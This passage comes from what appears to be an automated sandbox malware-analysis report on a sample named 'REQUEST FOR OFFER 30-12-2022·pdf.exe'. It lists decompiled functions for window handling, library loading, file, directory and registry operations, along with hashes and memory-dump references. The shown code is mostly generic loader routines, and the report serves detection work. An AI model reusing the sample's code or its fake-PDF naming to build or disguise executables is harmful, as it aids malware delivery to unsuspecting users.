Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 27312c436c9ff843498454bb2add62c91d309458af8813d49467a26edb6099cf
Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
Opcode Fuzzy Hash: 27312c436c9ff843498454bb2add62c91d309458af8813d49467a26edb6099cf
Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x429210;
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x24));
					_t4 =  *(_t16 - 0x28);
				}
				_t12 =  *0x429224;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402ade
0x00402aea

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e98b525f6a56ffd9ff8e74329cfc4b8f81890275e69b3923be9327f95a4e9a93
Instruction ID: 260cd15fba1b918f9c8f7222e6ae0819555963ba5a0cf8c35b7be57c581c0378
Opcode Fuzzy Hash: e98b525f6a56ffd9ff8e74329cfc4b8f81890275e69b3923be9327f95a4e9a93
Instruction Fuzzy Hash: 4DE04F76B00104EBCB24CBA4ED908AE77A6EB483147514D7AD502B32A0CA759C51CF38

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065EC(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E0040657C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004065f4
0x004065f7
0x004065fe
0x00406606
0x00406612
0x00000000
0x00406619
0x00406609
0x00406610
0x00000000
0x00406621
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
GetProcAddress.KERNEL32(00000000,?), ref: 00406619

Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
Part of subcall function 0040657C: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405deb
0x00405df8
0x00405e0d
0x00405e13

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405dc7
0x00405dcd
0x00405dd2
0x00405ddb
0x00405ddb
0x00405de4

APIs

GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DDB

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058BD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058c3
0x004058cb
0x00000000
0x004058d1
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
GetLastError.KERNEL32 ref: 004058D1

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C53(0xffffffd0);
				_t16 = E00402C53(0xffffffdf);
				E00402C53(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406555(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004060B3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x004028a1
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x0040224b
0x0040224b
0x0040224b
0x00402ade
0x00402aea

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 25b8106fbe88c90560af8e38f4dee3bdf1571c34cb6cfa2659216785cb95b5f3
Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
Opcode Fuzzy Hash: 25b8106fbe88c90560af8e38f4dee3bdf1571c34cb6cfa2659216785cb95b5f3
Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F

Uniqueness

Uniqueness Score: -1.00%

Function 00402805 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402805(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C31(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x50)) = _t15;
					_t10 = SetFilePointer(E00406172(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406159();
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402805
0x00402805
0x00402806
0x0040280e
0x00402813
0x00402814
0x00402823
0x0040282c
0x00402a7d
0x00402a7e
0x00402a81
0x00402a81
0x0040282c
0x00402ade
0x00402aea

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823

Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040230C(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C53(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C53(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C53(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C53(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040230c
0x0040230c
0x0040230e
0x00402312
0x00402315
0x0040231a
0x0040231f
0x00402328
0x00402328
0x0040232d
0x00402336
0x00402336
0x00402343
0x004015b4
0x004015b6
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402C53(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x0040286f
0x00402876
0x00402876
0x00402ade
0x00402aea

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: c48454b09d33ab2875862cf9c6ca45293d3f6118373925514345e8bff3e98cb9
Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
Opcode Fuzzy Hash: c48454b09d33ab2875862cf9c6ca45293d3f6118373925514345e8bff3e98cb9
Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402D5D(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402C53(0x22);
				_t9 =  *0x40cdd8; // 0x445fc48
				_t3 = _t9 + 4; // 0xb2f
				_t11 = RegOpenKeyExW(E00402D48( *_t3), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402d71
0x00402d77
0x00402d7c
0x00402d85
0x00402d8d
0x00402d95

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000B2F,00000000,00000022,00000000,?,?), ref: 00402D85

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E6A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e6e
0x00405e7e
0x00405e86
0x00000000
0x00405e8d
0x00000000
0x00405e8f

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
